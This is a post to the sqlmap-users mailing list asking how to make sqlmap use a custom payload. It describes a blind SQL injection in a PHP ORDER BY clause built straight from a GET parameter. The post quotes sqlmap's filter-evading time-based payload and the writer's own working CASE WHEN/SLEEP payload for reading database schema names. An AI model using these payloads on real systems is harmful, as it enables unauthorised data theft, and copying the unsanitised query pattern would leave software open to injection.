Hello, all.
I'm trying to exploit the blind injection in the following query:
$var = $_GET['var'];
SELECT id,name FROM people ORDER BY $var
sqlmap find vulnerabilities, but can not be used.
sqmap sends the following query:
name AND 561/*!50000=*/IF((ORD(MID((/*!50000SELECT*/
IF(ISNULL(/*!50000CAST*/(/*!50000COUNT*/(DISTINCT(schema_name)) AS
CHAR)),CHAR(32),/*!50000CAST*/(/*!50000COUNT*/(DISTINCT(schema_name)) AS
CHAR)) FROM /*!50000information_schema*/.SCHEMATA),1,1)) NOT BETWEEN 0 AND
1),SLEEP(5),561)
[22:20:36] [ERROR] unable to retrieve the number of databases
but it does not work. May interfere with some kind of filter.
But my request in browser url:
index.php?var=CASE WHEN (SELECT ASCII(SUBSTRING(schema_name, 1, 1)) FROM
/*!50000information_schema*/.SCHEMATA limit 0,1) NOT BETWEEN 0 AND 65 THEN
sleep(10) ELSE date END
It takes a successful ... How can I get sqlmap use my method of attack from
the one it uses by default.
Sincerely, Kirill
p.s. sorry for my bad english
------------------------------------------------------------------------------
Everyone hates slow websites. So do we.
Make your web apps faster with AppDynamics
Download AppDynamics Lite for free today:
http://p.sf.net/sfu/appdyn_d2d_feb
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
